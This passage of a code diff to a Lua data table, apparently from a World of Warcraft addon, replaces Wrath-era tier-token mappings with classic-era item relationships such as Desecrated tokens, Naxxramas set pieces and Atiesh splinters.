Vanquisher + -- Ironweave Gloves + ["22304"] = { + 228066, -- Ironweave Gloves }, - -- Heroes' Redemption Headpiece - ["39628"] = { - 40616, -- Helm of the Lost Conqueror + -- Ironweave Mantle + ["22305"] = { + 228700, -- Ironweave Mantle }, - -- Heroes' Redemption Tunic - ["39629"] = { - 40610, -- Chestguard of the Lost Conqueror + -- Ironweave Belt + ["22306"] = { + 228596, -- Ironweave Belt }, - -- Heroes' Redemption Greaves - ["39630"] = { - 40619, -- Leggings of the Lost Conqueror + -- Ironweave Boots + ["22311"] = { + 228597, -- Ironweave Boots }, - -- Heroes' Redemption Spaulders - ["39631"] = { - 40622, -- Spaulders of the Lost Conqueror + -- Ironweave Bracers + ["22313"] = { + 228598, -- Ironweave Bracers }, - -- Heroes' Redemption Gloves - ["39632"] = { - 40613, -- Gloves of the Lost Conqueror + -- Heart of Wyrmthalak + ["22321"] = { + 228599, -- Heart of Wyrmthalak }, - -- Heroes' Redemption Chestpiece - ["39633"] = { - 40610, -- Chestguard of the Lost Conqueror + -- The Jaw Breaker + ["22322"] = { + 228600, -- The Jaw Breaker }, - -- Heroes' Redemption Gauntlets - ["39634"] = { - 40613, -- Gloves of the Lost Conqueror + -- Amalgam's Band + ["22326"] = { + 228047, -- Amalgam's Band }, - -- Heroes' Redemption Helm - ["39635"] = { - 40616, -- Helm of the Lost Conqueror + -- Scepter of Interminable Focus + ["22329"] = { + 228548, -- Scepter of Interminable Focus }, - -- Heroes' Redemption Legplates - ["39636"] = { - 40619, -- Leggings of the Lost Conqueror + -- Blade of Necromancy + ["22332"] = { + 228028, -- Blade of Necromancy }, - -- Heroes' Redemption Shoulderplates - ["39637"] = { - 40622, -- Spaulders of the Lost Conqueror + -- Hammer of Divine Might + ["22333"] = { + 228033, -- Hammer of Divine Might }, - -- Heroes' Redemption Breastplate - ["39638"] = { - 40610, -- Chestguard of the Lost Conqueror + -- Lord Valthalak's Staff of Command + ["22335"] = { + 228682, -- Lord Valthalak's Staff of Command }, - -- Heroes' Redemption Handguards - ["39639"] = { - 40613, -- Gloves of the Lost Conqueror + -- Rune Band of Wizardry + ["22339"] = { + 228683, -- Rune Band of Wizardry }, - -- Heroes' Redemption Faceguard - ["39640"] = { - 40616, -- Helm of the Lost Conqueror + -- Pendant of Celerity + ["22340"] = { + 228684, -- Pendant of Celerity }, - -- Heroes' Redemption Legguards - ["39641"] = { - 40619, -- Leggings of the Lost Conqueror + -- Desecrated Breastplate + ["22349"] = { + 22416, -- Dreadnaught Breastplate + 22476, -- Bonescythe Breastplate }, - -- Heroes' Redemption Shoulderguards - ["39642"] = { - 40622, -- Spaulders of the Lost Conqueror + -- Desecrated Tunic + ["22350"] = { + 22425, -- Redemption Tunic + 22436, -- Cryptstalker Tunic + 22464, -- Earthshatter Tunic + 22488, -- Dreamwalker Tunic }, - -- Valorous Frostfire Gloves - ["40415"] = { - 40630, -- Gauntlets of the Lost Vanquisher + -- Desecrated Robe + ["22351"] = { + 22496, -- Frostfire Robe + 22504, -- Plagueheart Robe + 22512, -- Robe of Faith }, - -- Valorous Frostfire Circlet - ["40416"] = { - 40633, -- Crown of the Lost Vanquisher + -- Desecrated Legplates + ["22352"] = { + 22417, -- Dreadnaught Legplates + 22477, -- Bonescythe Legplates }, - -- Valorous Frostfire Leggings - ["40417"] = { - 40636, -- Legplates of the Lost Vanquisher + -- Desecrated Helmet + ["22353"] = { + 22418, -- Dreadnaught Helmet + 22478, -- Bonescythe Helmet }, - -- Valorous Frostfire Robe - ["40418"] = { - 40627, -- Breastplate of the Lost Vanquisher + -- Desecrated Pauldrons + ["22354"] = { + 22419, -- Dreadnaught Pauldrons + 22479, -- Bonescythe Pauldrons }, - -- Valorous Frostfire Shoulderpads - ["40419"] = { - 40639, -- Mantle of the Lost Vanquisher + -- Desecrated Bracers + ["22355"] = { + 22423, -- Dreadnaught Bracers + 22483, -- Bonescythe Bracers }, - -- Valorous Plagueheart Gloves - ["40420"] = { - 40628, -- Gauntlets of the Lost Conqueror + -- Desecrated Waistguard + ["22356"] = { + 22422, -- Dreadnaught Waistguard + 22482, -- Bonescythe Waistguard }, - -- Valorous Plagueheart Circlet - ["40421"] = { - 40631, -- Crown of the Lost Conqueror + -- Desecrated Gauntlets + ["22357"] = { + 22421, -- Dreadnaught Gauntlets + 22481, -- Bonescythe Gauntlets }, - -- Valorous Plagueheart Leggings - ["40422"] = { - 40634, -- Legplates of the Lost Conqueror + -- Desecrated Sabatons + ["22358"] = { + 22420, -- Dreadnaught Sabatons + 22480, -- Bonescythe Sabatons }, - -- Valorous Plagueheart Robe - ["40423"] = { - 40625, -- Breastplate of the Lost Conqueror + -- Desecrated Legguards + ["22359"] = { + 22427, -- Redemption Legguards + 22437, -- Cryptstalker Legguards + 22465, -- Earthshatter Legguards + 22489, -- Dreamwalker Legguards }, - -- Valorous Plagueheart Shoulderpads - ["40424"] = { - 40637, -- Mantle of the Lost Conqueror + -- Desecrated Headpiece + ["22360"] = { + 22428, -- Redemption Headpiece + 22438, -- Cryptstalker Headpiece + 22466, -- Earthshatter Headpiece + 22490, -- Dreamwalker Headpiece }, - -- Valorous Gloves of Faith - ["40445"] = { - 40628, -- Gauntlets of the Lost Conqueror + -- Desecrated Spaulders + ["22361"] = { + 22429, -- Redemption Spaulders + 22439, -- Cryptstalker Spaulders + 22467, -- Earthshatter Spaulders + 22491, -- Dreamwalker Spaulders }, - -- Valorous Crown of Faith - ["40447"] = { - 40631, -- Crown of the Lost Conqueror + -- Desecrated Wristguards + ["22362"] = { + 22424, -- Redemption Wristguards + 22443, -- Cryptstalker Wristguards + 22471, -- Earthshatter Wristguards + 22495, -- Dreamwalker Wristguards }, - -- Valorous Leggings of Faith - ["40448"] = { - 40634, -- Legplates of the Lost Conqueror + -- Desecrated Girdle + ["22363"] = { + 22431, -- Redemption Girdle + 22442, -- Cryptstalker Girdle + 22470, -- Earthshatter Girdle + 22494, -- Dreamwalker Girdle }, - -- Valorous Robe of Faith - ["40449"] = { - 40625, -- Breastplate of the Lost Conqueror + -- Desecrated Handguards + ["22364"] = { + 22426, -- Redemption Handguards + 22441, -- Cryptstalker Handguards + 22469, -- Earthshatter Handguards + 22493, -- Dreamwalker Handguards }, - -- Valorous Shoulderpads of Faith - ["40450"] = { - 40637, -- Mantle of the Lost Conqueror + -- Desecrated Boots + ["22365"] = { + 22430, -- Redemption Boots + 22440, -- Cryptstalker Boots + 22468, -- Earthshatter Boots + 22492, -- Dreamwalker Boots }, - -- Valorous Handwraps of Faith - ["40454"] = { - 40628, -- Gauntlets of the Lost Conqueror + -- Desecrated Leggings + ["22366"] = { + 22497, -- Frostfire Leggings + 22505, -- Plagueheart Leggings + 22513, -- Leggings of Faith }, - -- Valorous Circlet of Faith - ["40456"] = { - 40631, -- Crown of the Lost Conqueror + -- Desecrated Circlet + ["22367"] = { + 22498, -- Frostfire Circlet + 22506, -- Plagueheart Circlet + 22514, -- Circlet of Faith }, - -- Valorous Pants of Faith - ["40457"] = { - 40634, -- Legplates of the Lost Conqueror + -- Desecrated Shoulderpads + ["22368"] = { + 22499, -- Frostfire Shoulderpads + 22507, -- Plagueheart Shoulderpads + 22515, -- Shoulderpads of Faith }, - -- Valorous Raiments of Faith - ["40458"] = { - 40625, -- Breastplate of the Lost Conqueror + -- Desecrated Bindings + ["22369"] = { + 22503, -- Frostfire Bindings + 22511, -- Plagueheart Bindings + 22519, -- Bindings of Faith }, - -- Valorous Mantle of Faith - ["40459"] = { - 40637, -- Mantle of the Lost Conqueror + -- Desecrated Belt + ["22370"] = { + 22502, -- Frostfire Belt + 22510, -- Plagueheart Belt + 22518, -- Belt of Faith }, - -- Valorous Dreamwalker Handguards - ["40460"] = { - 40630, -- Gauntlets of the Lost Vanquisher + -- Desecrated Gloves + ["22371"] = { + 22501, -- Frostfire Gloves + 22509, -- Plagueheart Gloves + 22517, -- Gloves of Faith }, - -- Valorous Dreamwalker Headpiece - ["40461"] = { - 40633, -- Crown of the Lost Vanquisher + -- Desecrated Sandals + ["22372"] = { + 22500, -- Frostfire Sandals + 22508, -- Plagueheart Sandals + 22516, -- Sandals of Faith }, - -- Valorous Dreamwalker Leggings - ["40462"] = { - 40636, -- Legplates of the Lost Vanquisher + -- Totem of Rage + ["22395"] = { + 227977, -- Totem of Rage }, - -- Valorous Dreamwalker Robe - ["40463"] = { - 40627, -- Breastplate of the Lost Vanquisher + -- Libram of Truth + ["22400"] = { + 227976, -- Libram of Truth }, - -- Valorous Dreamwalker Spaulders - ["40465"] = { - 40639, -- Mantle of the Lost Vanquisher + -- Tunic of the Crescent Moon + ["22409"] = { + 228551, -- Tunic of the Crescent Moon }, - -- Valorous Dreamwalker Gloves - ["40466"] = { - 40630, -- Gauntlets of the Lost Vanquisher + -- Gauntlets of Deftness + ["22410"] = { + 228552, -- Gauntlets of Deftness }, - -- Valorous Dreamwalker Cover - ["40467"] = { - 40633, -- Crown of the Lost Vanquisher + -- Helm of the Executioner + ["22411"] = { + 228553, -- Helm of the Executioner }, - -- Valorous Dreamwalker Trousers - ["40468"] = { - 40636, -- Legplates of the Lost Vanquisher + -- Dreadnaught Breastplate + ["22416"] = { + 22349, -- Desecrated Breastplate }, - -- Valorous Dreamwalker Vestments - ["40469"] = { - 40627, -- Breastplate of the Lost Vanquisher + -- Dreadnaught Legplates + ["22417"] = { + 22352, -- Desecrated Legplates }, - -- Valorous Dreamwalker Mantle - ["40470"] = { - 40639, -- Mantle of the Lost Vanquisher + -- Dreadnaught Helmet + ["22418"] = { + 22353, -- Desecrated Helmet }, - -- Valorous Dreamwalker Raiments - ["40471"] = { - 40627, -- Breastplate of the Lost Vanquisher + -- Dreadnaught Pauldrons + ["22419"] = { + 22354, -- Desecrated Pauldrons }, - -- Valorous Dreamwalker Handgrips - ["40472"] = { - 40630, -- Gauntlets of the Lost Vanquisher + -- Dreadnaught Sabatons + ["22420"] = { + 22358, -- Desecrated Sabatons }, - -- Valorous Dreamwalker Headguard - ["40473"] = { - 40633, -- Crown of the Lost Vanquisher + -- Dreadnaught Gauntlets + ["22421"] = { + 22357, -- Desecrated Gauntlets }, - -- Valorous Dreamwalker Legguards - ["40493"] = { - 40636, -- Legplates of the Lost Vanquisher - }, - -- Valorous Dreamwalker Shoulderpads - ["40494"] = { - 40639, -- Mantle of the Lost Vanquisher + -- Dreadnaught Waistguard + ["22422"] = { + 22356, -- Desecrated Waistguard }, - -- Valorous Bonescythe Breastplate - ["40495"] = { - 40627, -- Breastplate of the Lost Vanquisher + -- Dreadnaught Bracers + ["22423"] = { + 22355, -- Desecrated Bracers }, - -- Valorous Bonescythe Gauntlets - ["40496"] = { - 40630, -- Gauntlets of the Lost Vanquisher + -- Redemption Wristguards + ["22424"] = { + 22362, -- Desecrated Wristguards }, - -- Valorous Bonescythe Helmet - ["40499"] = { - 40633, -- Crown of the Lost Vanquisher + -- Redemption Tunic + ["22425"] = { + 22350, -- Desecrated Tunic }, - -- Valorous Bonescythe Legplates - ["40500"] = { - 40636, -- Legplates of the Lost Vanquisher + -- Redemption Handguards + ["22426"] = { + 22364, -- Desecrated Handguards }, - -- Valorous Bonescythe Pauldrons - ["40502"] = { - 40639, -- Mantle of the Lost Vanquisher + -- Redemption Legguards + ["22427"] = { + 22359, -- Desecrated Legguards }, - -- Valorous Cryptstalker Tunic - ["40503"] = { - 40626, -- Breastplate of the Lost Protector + -- Redemption Headpiece + ["22428"] = { + 22360, -- Desecrated Headpiece }, - -- Valorous Cryptstalker Handguards - ["40504"] = { - 40629, -- Gauntlets of the Lost Protector + -- Redemption Spaulders + ["22429"] = { + 22361, -- Desecrated Spaulders }, - -- Valorous Cryptstalker Headpiece - ["40505"] = { - 40632, -- Crown of the Lost Protector + -- Redemption Boots + ["22430"] = { + 22365, -- Desecrated Boots }, - -- Valorous Cryptstalker Legguards - ["40506"] = { - 40635, -- Legplates of the Lost Protector + -- Redemption Girdle + ["22431"] = { + 22363, -- Desecrated Girdle }, - -- Valorous Cryptstalker Spaulders - ["40507"] = { - 40638, -- Mantle of the Lost Protector + -- Don Mauricio's Band of Domination + ["22433"] = { + 228046, -- Don Mauricio's Band of Domination }, - -- Valorous Earthshatter Tunic - ["40508"] = { - 40626, -- Breastplate of the Lost Protector + -- Cryptstalker Tunic + ["22436"] = { + 22350, -- Desecrated Tunic }, - -- Valorous Earthshatter Handguards - ["40509"] = { - 40629, -- Gauntlets of the Lost Protector + -- Cryptstalker Legguards + ["22437"] = { + 22359, -- Desecrated Legguards }, - -- Valorous Earthshatter Headpiece - ["40510"] = { - 40632, -- Crown of the Lost Protector + -- Cryptstalker Headpiece + ["22438"] = { + 22360, -- Desecrated Headpiece }, - -- Valorous Earthshatter Legguards - ["40512"] = { - 40635, -- Legplates of the Lost Protector + -- Cryptstalker Spaulders + ["22439"] = { + 22361, -- Desecrated Spaulders }, - -- Valorous Earthshatter Spaulders - ["40513"] = { - 40638, -- Mantle of the Lost Protector + -- Cryptstalker Boots + ["22440"] = { + 22365, -- Desecrated Boots }, - -- Valorous Earthshatter Hauberk - ["40514"] = { - 40626, -- Breastplate of the Lost Protector + -- Cryptstalker Handguards + ["22441"] = { + 22364, -- Desecrated Handguards }, - -- Valorous Earthshatter Gloves - ["40515"] = { - 40629, -- Gauntlets of the Lost Protector + -- Cryptstalker Girdle + ["22442"] = { + 22363, -- Desecrated Girdle }, - -- Valorous Earthshatter Helm - ["40516"] = { - 40632, -- Crown of the Lost Protector + -- Cryptstalker Wristguards + ["22443"] = { + 22362, -- Desecrated Wristguards }, - -- Valorous Earthshatter Kilt - ["40517"] = { - 40635, -- Legplates of the Lost Protector + -- Earthshatter Tunic + ["22464"] = { + 22350, -- Desecrated Tunic }, - -- Valorous Earthshatter Shoulderpads - ["40518"] = { - 40638, -- Mantle of the Lost Protector + -- Earthshatter Legguards + ["22465"] = { + 22359, -- Desecrated Legguards }, - -- Valorous Earthshatter Grips - ["40520"] = { - 40629, -- Gauntlets of the Lost Protector + -- Earthshatter Headpiece + ["22466"] = { + 22360, -- Desecrated Headpiece }, - -- Valorous Earthshatter Faceguard - ["40521"] = { - 40632, -- Crown of the Lost Protector + -- Earthshatter Spaulders + ["22467"] = { + 22361, -- Desecrated Spaulders }, - -- Valorous Earthshatter War-Kilt - ["40522"] = { - 40635, -- Legplates of the Lost Protector + -- Earthshatter Boots + ["22468"] = { + 22365, -- Desecrated Boots }, - -- Valorous Earthshatter Chestguard - ["40523"] = { - 40626, -- Breastplate of the Lost Protector + -- Earthshatter Handguards + ["22469"] = { + 22364, -- Desecrated Handguards }, - -- Valorous Earthshatter Shoulderguards - ["40524"] = { - 40638, -- Mantle of the Lost Protector + -- Earthshatter Girdle + ["22470"] = { + 22363, -- Desecrated Girdle }, - -- Valorous Dreadnaught Battleplate - ["40525"] = { - 40626, -- Breastplate of the Lost Protector + -- Earthshatter Wristguards + ["22471"] = { + 22362, -- Desecrated Wristguards }, - -- Valorous Dreadnaught Gauntlets - ["40527"] = { - 40629, -- Gauntlets of the Lost Protector + -- Bonescythe Breastplate + ["22476"] = { + 22349, -- Desecrated Breastplate }, - -- Valorous Dreadnaught Helmet - ["40528"] = { - 40632, -- Crown of the Lost Protector + -- Bonescythe Legplates + ["22477"] = { + 22352, -- Desecrated Legplates }, - -- Valorous Dreadnaught Legplates - ["40529"] = { - 40635, -- Legplates of the Lost Protector + -- Bonescythe Helmet + ["22478"] = { + 22353, -- Desecrated Helmet }, - -- Valorous Dreadnaught Shoulderplates - ["40530"] = { - 40638, -- Mantle of the Lost Protector + -- Bonescythe Pauldrons + ["22479"] = { + 22354, -- Desecrated Pauldrons }, - -- Valorous Dreadnaught Breastplate - ["40544"] = { - 40626, -- Breastplate of the Lost Protector + -- Bonescythe Sabatons + ["22480"] = { + 22358, -- Desecrated Sabatons }, - -- Valorous Dreadnaught Handguards - ["40545"] = { - 40629, -- Gauntlets of the Lost Protector + -- Bonescythe Gauntlets + ["22481"] = { + 22357, -- Desecrated Gauntlets }, - -- Valorous Dreadnaught Greathelm - ["40546"] = { - 40632, -- Crown of the Lost Protector + -- Bonescythe Waistguard + ["22482"] = { + 22356, -- Desecrated Waistguard }, - -- Valorous Dreadnaught Legguards - ["40547"] = { - 40635, -- Legplates of the Lost Protector + -- Bonescythe Bracers + ["22483"] = { + 22355, -- Desecrated Bracers }, - -- Valorous Dreadnaught Pauldrons - ["40548"] = { - 40638, -- Mantle of the Lost Protector + -- Dreamwalker Tunic + ["22488"] = { + 22350, -- Desecrated Tunic }, - -- Valorous Scourgeborne Battleplate - ["40550"] = { - 40627, -- Breastplate of the Lost Vanquisher + -- Dreamwalker Legguards + ["22489"] = { + 22359, -- Desecrated Legguards }, - -- Valorous Scourgeborne Gauntlets - ["40552"] = { - 40630, -- Gauntlets of the Lost Vanquisher + -- Dreamwalker Headpiece + ["22490"] = { + 22360, -- Desecrated Headpiece }, - -- Valorous Scourgeborne Helmet - ["40554"] = { - 40633, -- Crown of the Lost Vanquisher + -- Dreamwalker Spaulders + ["22491"] = { + 22361, -- Desecrated Spaulders }, - -- Valorous Scourgeborne Legplates - ["40556"] = { - 40636, -- Legplates of the Lost Vanquisher + -- Dreamwalker Boots + ["22492"] = { + 22365, -- Desecrated Boots }, - -- Valorous Scourgeborne Shoulderplates - ["40557"] = { - 40639, -- Mantle of the Lost Vanquisher + -- Dreamwalker Handguards + ["22493"] = { + 22364, -- Desecrated Handguards }, - -- Valorous Scourgeborne Chestguard - ["40559"] = { - 40627, -- Breastplate of the Lost Vanquisher + -- Dreamwalker Girdle + ["22494"] = { + 22363, -- Desecrated Girdle }, - -- Valorous Scourgeborne Handguards - ["40563"] = { - 40630, -- Gauntlets of the Lost Vanquisher + -- Dreamwalker Wristguards + ["22495"] = { + 22362, -- Desecrated Wristguards }, - -- Valorous Scourgeborne Faceguard - ["40565"] = { - 40633, -- Crown of the Lost Vanquisher + -- Frostfire Robe + ["22496"] = { + 22351, -- Desecrated Robe }, - -- Valorous Scourgeborne Legguards - ["40567"] = { - 40636, -- Legplates of the Lost Vanquisher + -- Frostfire Leggings + ["22497"] = { + 22366, -- Desecrated Leggings }, - -- Valorous Scourgeborne Pauldrons - ["40568"] = { - 40639, -- Mantle of the Lost Vanquisher + -- Frostfire Circlet + ["22498"] = { + 22367, -- Desecrated Circlet }, - -- Valorous Redemption Tunic - ["40569"] = { - 40625, -- Breastplate of the Lost Conqueror + -- Frostfire Shoulderpads + ["22499"] = { + 22368, -- Desecrated Shoulderpads }, - -- Valorous Redemption Gloves - ["40570"] = { - 40628, -- Gauntlets of the Lost Conqueror + -- Frostfire Sandals + ["22500"] = { + 22372, -- Desecrated Sandals }, - -- Valorous Redemption Headpiece - ["40571"] = { - 40631, -- Crown of the Lost Conqueror + -- Frostfire Gloves + ["22501"] = { + 22371, -- Desecrated Gloves }, - -- Valorous Redemption Greaves - ["40572"] = { - 40634, -- Legplates of the Lost Conqueror + -- Frostfire Belt + ["22502"] = { + 22370, -- Desecrated Belt }, - -- Valorous Redemption Spaulders - ["40573"] = { - 40637, -- Mantle of the Lost Conqueror + -- Frostfire Bindings + ["22503"] = { + 22369, -- Desecrated Bindings }, - -- Valorous Redemption Chestpiece - ["40574"] = { - 40625, -- Breastplate of the Lost Conqueror + -- Plagueheart Robe + ["22504"] = { + 22351, -- Desecrated Robe }, - -- Valorous Redemption Gauntlets - ["40575"] = { - 40628, -- Gauntlets of the Lost Conqueror + -- Plagueheart Leggings + ["22505"] = { + 22366, -- Desecrated Leggings }, - -- Valorous Redemption Helm - ["40576"] = { - 40631, -- Crown of the Lost Conqueror + -- Plagueheart Circlet + ["22506"] = { + 22367, -- Desecrated Circlet }, - -- Valorous Redemption Legplates - ["40577"] = { - 40634, -- Legplates of the Lost Conqueror + -- Plagueheart Shoulderpads + ["22507"] = { + 22368, -- Desecrated Shoulderpads }, - -- Valorous Redemption Shoulderplates - ["40578"] = { - 40637, -- Mantle of the Lost Conqueror + -- Plagueheart Sandals + ["22508"] = { + 22372, -- Desecrated Sandals }, - -- Valorous Redemption Breastplate - ["40579"] = { - 40625, -- Breastplate of the Lost Conqueror + -- Plagueheart Gloves + ["22509"] = { + 22371, -- Desecrated Gloves }, - -- Valorous Redemption Handguards - ["40580"] = { - 40628, -- Gauntlets of the Lost Conqueror + -- Plagueheart Belt + ["22510"] = { + 22370, -- Desecrated Belt }, - -- Valorous Redemption Faceguard - ["40581"] = { - 40631, -- Crown of the Lost Conqueror + -- Plagueheart Bindings + ["22511"] = { + 22369, -- Desecrated Bindings }, - -- Valorous Redemption Legguards - ["40583"] = { - 40634, -- Legplates of the Lost Conqueror + -- Robe of Faith + ["22512"] = { + 22351, -- Desecrated Robe }, - -- Valorous Redemption Shoulderguards - ["40584"] = { - 40637, -- Mantle of the Lost Conqueror + -- Leggings of Faith + ["22513"] = { + 22366, -- Desecrated Leggings }, - -- Chestguard of the Lost Conqueror - ["40610"] = { - 39497, -- Heroes' Plagueheart Robe - 39515, -- Heroes' Robe of Faith - 39523, -- Heroes' Raiments of Faith - 39629, -- Heroes' Redemption Tunic - 39633, -- Heroes' Redemption Chestpiece - 39638, -- Heroes' Redemption Breastplate + -- Circlet of Faith + ["22514"] = { + 22367, -- Desecrated Circlet }, - -- Chestguard of the Lost Protector - ["40611"] = { - 39579, -- Heroes' Cryptstalker Tunic - 39588, -- Heroes' Earthshatter Tunic - 39592, -- Heroes' Earthshatter Hauberk - 39597, -- Heroes' Earthshatter Chestguard - 39606, -- Heroes' Dreadnaught Battleplate - 39611, -- Heroes' Dreadnaught Breastplate + -- Shoulderpads of Faith + ["22515"] = { + 22368, -- Desecrated Shoulderpads }, - -- Chestguard of the Lost Vanquisher - ["40612"] = { - 39492, -- Heroes' Frostfire Robe - 39538, -- Heroes' Dreamwalker Robe - 39547, -- Heroes' Dreamwalker Vestments - 39554, -- Heroes' Dreamwalker Raiments - 39558, -- Heroes' Bonescythe Breastplate - 39617, -- Heroes' Scourgeborne Battleplate - 39623, -- Heroes' Scourgeborne Chestguard + -- Sandals of Faith + ["22516"] = { + 22372, -- Desecrated Sandals }, - -- Gloves of the Lost Conqueror - ["40613"] = { - 39500, -- Heroes' Plagueheart Gloves - 39519, -- Heroes' Gloves of Faith - 39530, -- Heroes' Handwraps of Faith - 39632, -- Heroes' Redemption Gloves - 39634, -- Heroes' Redemption Gauntlets - 39639, -- Heroes' Redemption Handguards + -- Gloves of Faith + ["22517"] = { + 22371, -- Desecrated Gloves }, - -- Gloves of the Lost Protector - ["40614"] = { - 39582, -- Heroes' Cryptstalker Handguards - 39591, -- Heroes' Earthshatter Handguards - 39593, -- Heroes' Earthshatter Gloves - 39601, -- Heroes' Earthshatter Grips - 39609, -- Heroes' Dreadnaught Gauntlets - 39622, -- Heroes' Dreadnaught Handguards + -- Belt of Faith + ["22518"] = { + 22370, -- Desecrated Belt }, - -- Gloves of the Lost Vanquisher - ["40615"] = { - 39495, -- Heroes' Frostfire Gloves - 39543, -- Heroes' Dreamwalker Handguards - 39544, -- Heroes' Dreamwalker Gloves - 39557, -- Heroes' Dreamwalker Handgrips - 39560, -- Heroes' Bonescythe Gauntlets - 39618, -- Heroes' Scourgeborne Gauntlets - 39624, -- Heroes' Scourgeborne Handguards + -- Bindings of Faith + ["22519"] = { + 22369, -- Desecrated Bindings }, - -- Helm of the Lost Conqueror - ["40616"] = { - 39496, -- Heroes' Plagueheart Circlet - 39514, -- Heroes' Crown of Faith - 39521, -- Heroes' Circlet of Faith - 39628, -- Heroes' Redemption Headpiece - 39635, -- Heroes' Redemption Helm - 39640, -- Heroes' Redemption Faceguard + -- The Phylactery of Kel'Thuzad + ["22520"] = { + 23206, -- Mark of the Champion + 23207, -- Mark of the Champion }, - -- Helm of the Lost Protector - ["40617"] = { - 39578, -- Heroes' Cryptstalker Headpiece - 39583, -- Heroes' Earthshatter Headpiece - 39594, -- Heroes' Earthshatter Helm - 39602, -- Heroes' Earthshatter Faceguard - 39605, -- Heroes' Dreadnaught Helmet - 39610, -- Heroes' Dreadnaught Greathelm + -- Atiesh, Greatstaff of the Guardian (mage) + ["22589"] = { + 22726, -- Splinter of Atiesh }, - -- Helm of the Lost Vanquisher - ["40618"] = { - 39491, -- Heroes' Frostfire Circlet - 39531, -- Heroes' Dreamwalker Headpiece - 39545, -- Heroes' Dreamwalker Cover - 39553, -- Heroes' Dreamwalker Headguard - 39561, -- Heroes' Bonescythe Helmet - 39619, -- Heroes' Scourgeborne Helmet - 39625, -- Heroes' Scourgeborne Faceguard + -- Atiesh, Greatstaff of the Guardian (warlock) + ["22630"] = { + 22726, -- Splinter of Atiesh }, - -- Leggings of the Lost Conqueror - ["40619"] = { - 39498, -- Heroes' Plagueheart Leggings - 39517, -- Heroes' Leggings of Faith - 39528, -- Heroes' Pants of Faith - 39630, -- Heroes' Redemption Greaves - 39636, -- Heroes' Redemption Legplates - 39641, -- Heroes' Redemption Legguards + -- Atiesh, Greatstaff of the Guardian (priest) + ["22631"] = { + 22726, -- Splinter of Atiesh }, - -- Leggings of the Lost Protector - ["40620"] = { - 39580, -- Heroes' Cryptstalker Legguards - 39589, -- Heroes' Earthshatter Legguards - 39595, -- Heroes' Earthshatter Kilt - 39603, -- Heroes' Earthshatter War-Kilt - 39607, -- Heroes' Dreadnaught Legplates - 39612, -- Heroes' Dreadnaught Legguards + -- Atiesh, Greatstaff of the Guardian (druid) + ["22632"] = { + 22726, -- Splinter of Atiesh }, - -- Leggings of the Lost Vanquisher - ["40621"] = { - 39493, -- Heroes' Frostfire Leggings - 39539, -- Heroes' Dreamwalker Leggings - 39546, -- Heroes' Dreamwalker Trousers - 39555, -- Heroes' Dreamwalker Legguards - 39564, -- Heroes' Bonescythe Legplates - 39620, -- Heroes' Scourgeborne Legplates - 39626, -- Heroes' Scourgeborne Legguards + -- Supply Bag + ["22679"] = { + 217014, -- Supply Bag }, - -- Spaulders of the Lost Conqueror - ["40622"] = { - 39499, -- Heroes' Plagueheart Shoulderpads - 39518, -- Heroes' Shoulderpads of Faith - 39529, -- Heroes' Mantle of Faith - 39631, -- Heroes' Redemption Spaulders - 39637, -- Heroes' Redemption Shoulderplates - 39642, -- Heroes' Redemption Shoulderguards + -- Splinter of Atiesh + ["22726"] = { + 22589, -- Atiesh, Greatstaff of the Guardian (mage) + 22630, -- Atiesh, Greatstaff of the Guardian (warlock) + 22631, -- Atiesh, Greatstaff of the Guardian (priest) + 22632, -- Atiesh, Greatstaff of the Guardian (druid) }, - -- Spaulders of the Lost Protector - ["40623"] = { - 39581, -- Heroes' Cryptstalker Spaulders - 39590, -- Heroes' Earthshatter Spaulders - 39596, -- Heroes' Earthshatter Shoulderpads - 39604, -- Heroes' Earthshatter Shoulderguards - 39608, -- Heroes' Dreadnaught Shoulderplates - 39613, -- Heroes' Dreadnaught Pauldrons + -- Blood Guard's Chain Greaves + ["22843"] = { + 227074, -- Blood Guard's Chain Greaves }, - -- Spaulders of the Lost Vanquisher - ["40624"] = { - 39494, -- Heroes' Frostfire Shoulderpads - 39542, -- Heroes' Dreamwalker Spaulders - 39548, -- Heroes' Dreamwalker Mantle - 39556, -- Heroes' Dreamwalker Shoulderpads - 39565, -- Heroes' Bonescythe Pauldrons - 39621, -- Heroes' Scourgeborne Shoulderplates - 39627, -- Heroes' Scourgeborne Pauldrons + -- Blood Guard's Dragonhide Treads + ["22852"] = { + 227181, -- Blood Guard's Dragonhide Treads }, - -- Breastplate of the Lost Conqueror - ["40625"] = { - 40423, -- Valorous Plagueheart Robe - 40449, -- Valorous Robe of Faith - 40458, -- Valorous Raiments of Faith - 40569, -- Valorous Redemption Tunic - 40574, -- Valorous Redemption Chestpiece - 40579, -- Valorous Redemption Breastplate + -- Blood Guard's Dreadweave Walkers + ["22855"] = { + 227098, -- Blood Guard's Dreadweave Walkers }, - -- Breastplate of the Lost Protector - ["40626"] = { - 40503, -- Valorous Cryptstalker Tunic - 40508, -- Valorous Earthshatter Tunic - 40514, -- Valorous Earthshatter Hauberk - 40523, -- Valorous Earthshatter Chestguard - 40525, -- Valorous Dreadnaught Battleplate - 40544, -- Valorous Dreadnaught Breastplate + -- Blood Guard's Leather Walkers + ["22856"] = { + 227062, -- Blood Guard's Leather Walkers }, - -- Breastplate of the Lost Vanquisher - ["40627"] = { - 40418, -- Valorous Frostfire Robe - 40463, -- Valorous Dreamwalker Robe - 40469, -- Valorous Dreamwalker Vestments - 40471, -- Valorous Dreamwalker Raiments - 40495, -- Valorous Bonescythe Breastplate - 40550, -- Valorous Scourgeborne Battleplate - 40559, -- Valorous Scourgeborne Chestguard + -- Blood Guard's Mail Greaves + ["22857"] = { + 227158, -- Blood Guard's Mail Greaves }, - -- Gauntlets of the Lost Conqueror - ["40628"] = { - 40420, -- Valorous Plagueheart Gloves - 40445, -- Valorous Gloves of Faith - 40454, -- Valorous Handwraps of Faith - 40570, -- Valorous Redemption Gloves - 40575, -- Valorous Redemption Gauntlets - 40580, -- Valorous Redemption Handguards + -- Blood Guard's Plate Greaves + ["22858"] = { + 227051, -- Blood Guard's Plate Greaves }, - -- Gauntlets of the Lost Protector - ["40629"] = { - 40504, -- Valorous Cryptstalker Handguards - 40509, -- Valorous Earthshatter Handguards - 40515, -- Valorous Earthshatter Gloves - 40520, -- Valorous Earthshatter Grips - 40527, -- Valorous Dreadnaught Gauntlets - 40545, -- Valorous Dreadnaught Handguards + -- Blood Guard's Satin Walkers + ["22859"] = { + 227127, -- Blood Guard's Satin Walkers }, - -- Gauntlets of the Lost Vanquisher - ["40630"] = { - 40415, -- Valorous Frostfire Gloves - 40460, -- Valorous Dreamwalker Handguards - 40466, -- Valorous Dreamwalker Gloves - 40472, -- Valorous Dreamwalker Handgrips - 40496, -- 